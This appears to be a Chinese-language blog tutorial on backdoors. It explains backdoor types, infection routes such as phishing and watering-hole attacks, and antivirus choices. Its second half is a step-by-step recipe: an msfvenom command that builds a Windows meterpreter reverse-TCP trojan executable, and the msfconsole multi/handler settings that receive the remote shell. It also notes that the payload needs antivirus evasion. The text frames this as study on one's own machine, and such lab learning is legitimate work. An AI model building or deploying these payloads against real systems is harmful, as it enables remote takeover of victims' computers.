文章仅用于交流与学习计算机技术,请勿在未经授权的情况下擅自入侵、控制、修改、破坏或其他任何方式对它人的计算机进行违法行为。(搞事情前要三思阿)
一、
1.关于后门 (有不足的地方欢迎各位大佬指点、补充)
后门是指能够绕过安全性控制并且获取对程序或系统访问权限的程序及方法,在软件开发阶段,一些程序员往往会在软件内创建后门程序以便可以修改程序中存在的缺陷,但后门一旦被其他人知道,或者是在发布软件前没有删除后门程序,这个时候就成了安全风险,非常容易被当成漏洞来进行攻击。
2.后门的类型
网页后门、线程插入后门、拓展后门、C/S后门
网页后门通常是服务器上正常的web服务来构造自己的连接方式,如ASP、CGI脚本后门等
线程插入后门运行时没有进程,所有操作均在其他应用程序的进程中完成,所以对其查杀比较困难。
拓展后门可以理解成集成了许多功能的一种后门,让后门本身就可以实现很多功能,例如文件上传与下载、系统用户检测、HTTP访问、终端安装、端口开放等,相当于一个工具包,嘎嘎强。
C/S后门传统木马程序是使用的架构,方便控制,且能避免万能密码的情况出现。
3.后门病毒如何让目标中招
如何让目标中招,可以通过欺骗、引导或诱导等方式让目标打开或下载程序,文件,网页,再或者利用系统的漏洞进行攻击,常见的方式如水坑,钓鱼,鱼叉式钓鱼等。
4.如何预防与查杀后门程序/病毒
首先就是杀毒软件,免费版的推荐:火绒内存占用量小,且没有广告装完电脑更干净也是我本人在用的。 360功能巨多且强大但是广告也多。(要是有没说到的欢迎大佬补充,狗头保命)
付费的话推荐:企业版火绒,360天擎,卡巴斯基这些,实际上到了付费的杀毒软件好像就没有特别差的。(360天擎安上去想卸载可就要了亲命了)
然后就是及时更新病毒库与系统补丁并且来源不明的可疑文件、软件、程序等要小心,或者直接扔进沙箱里用段时间,确定没问题在拿出来。
最后,少看其他国家小姐姐的动作片(狗头)。
二、
1.关于后门的生成与使用
生成后门和使用需要kali*1 受害者*1 (建议受害者是你自己)下面连接有kali的下载教程https://blog.csdn.net/2301_77441874/article/details/131232146?spm=1001.2014.3001.5501
首先打开kali,然后进入root账户,如图。
随后开始调用参数,此方法做出来的后门需做免杀,要不弹出来杀软就给你隔离。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.40 lport=444 -f exe -o xxx.exe -p:payload要做什么 -p后windows:生成针对某个系统的木马可更改例Linux x64:架构可更改如x86或其他系统架构 meterpreter:作用不建议更改,因为此模块较为完善 reverse_tcp:方式 lhost=:kali的IP lport:端口0-65535 -f:format生成的格式exe为Windows的可执行文件 -o:output输出的名字可随意指定
程序生成后的地址是在root用户后面的地址:/home/kali里面。
2.
当后门文件已具备被目标打开条件时,调取msf,调取handler,然后调试,调试时的数据要和创建的数据要一样例如端口与IP,然后run就进去了
msf6调用命令:msfconsole
调用模块:use exploit/multi/handler
设置:options
set payload windows/x64/meterpreter/reverse_tcp
set lhost=192.168.1.40
set lport=444
run